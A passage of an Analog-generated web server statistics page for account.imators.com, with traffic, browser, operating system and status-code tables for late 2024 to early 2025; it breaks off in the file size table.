<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Sat, Feb 22 2025 at 1:13 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Fri, Feb 21 2025 at 7:40 PM (110.16 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Feb 22 2025 at 1:13 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 212 (7) <br /><span class="gensumtitle">Average successful requests per day:</span> 1 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 114 (7) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 151 (2) <br /><span class="gensumtitle">Distinct files requested:</span> 19 (69) <br /><span class="gensumtitle">Distinct hosts served:</span> 111 (133) <br /><span class="gensumtitle">Data transferred:</span> 177.71 kilobytes (4.21 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.61 kilobytes (615 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">11</td><td class="P">11</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Nov 2024 (60 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">80</td><td class="P">35</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">36</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">7</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">12</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">14</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">47</td><td class="P">25</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">16</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">11</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 2</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">10</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 4</td><td class="R">9</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 6</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 7</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 8</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 9</td><td class="R">22</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">12</td><td class="R">4</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">14</td><td class="R">8</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">15</td><td class="R">34</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">32</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">17</td><td class="R">40</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">19</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">20</td><td class="R">6</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">21</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">22</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">212</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">52</td><td class="b">28.67%</td><td class="xl">205.169</td></tr> <tr><td class="R">23</td><td class="b">12.91%</td><td class="xl">44</td></tr> <tr><td class="R">16</td><td class="b"> 7.58%</td><td class="xl">54</td></tr> <tr><td class="R">13</td><td class="b"> 7.80%</td><td class="xl">34</td></tr> <tr><td class="R">12</td><td class="b"> 5.86%</td><td class="xl">35</td></tr> <tr><td class="R">8</td><td class="b"> 2.71%</td><td class="xl">167.94</td></tr> <tr><td class="R">8</td><td class="b"> 5.55%</td><td class="xl">205.210</td></tr> <tr><td class="R">5</td><td class="b"> 2.41%</td><td class="xl">64.227</td></tr> <tr><td class="R">4</td><td class="b"> 0.14%</td><td class="xl">194.87</td></tr> <tr><td class="R">4</td><td class="b"> 2.78%</td><td class="xl">192.175</td></tr> <tr><td class="R">4</td><td class="b"> 2.78%</td><td class="xl">198.235</td></tr> <tr><td class="R">4</td><td class="b"> 1.35%</td><td class="xl">138.197</td></tr> <tr><td class="R">4</td><td class="b"> 1.35%</td><td class="xl">87</td></tr> <tr><td class="R">3</td><td class="b"> 1.01%</td><td class="xl">161.35</td></tr> <tr><td class="R">3</td><td class="b"> 0.76%</td><td class="xl">104</td></tr> <tr><td class="R">3</td><td class="b"> 1.73%</td><td class="xl">138.68</td></tr> <tr><td class="R">3</td><td class="b"> 1.02%</td><td class="xl">206.168</td></tr> <tr><td class="R">2</td><td class="b"> 0.68%</td><td class="xl">137.184</td></tr> <tr><td class="R">2</td><td class="b"> 0.68%</td><td class="xl">157.245</td></tr> <tr><td class="R">2</td><td class="b"> 0.10%</td><td class="xl">16</td></tr> <tr><td class="R">37</td><td class="b">12.13%</td><td class="xl">[not listed: 27 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">19</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">8</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">44</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">30</td><td class="xl">http://account.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">18</td><td class="P">18</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">15</td><td class="P">15</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">25</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">3</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36</td></tr> <tr><td class="R">24</td><td class="P">0</td><td class="xl">[not listed: 5 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">128</td><td class="P">51</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">115</td><td class="P">46</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">3</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">2</td><td class="R">50</td><td class="P">40</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">5</td><td class="P">5</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">4</td><td class="R">4</td><td class="P">4</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr><td class="N"> </td><td class="R">11</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">65</td><td class="P">45</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">77</td><td class="P">28</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">68</td><td class="P">25</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">3</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">36</td><td class="P">19</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">36</td><td class="P">19</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">20</td><td class="P">8</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">212</td><td class="xl">200 OK</td></tr> <tr><td class="R">32</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">119</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">14</td><td class="b"> 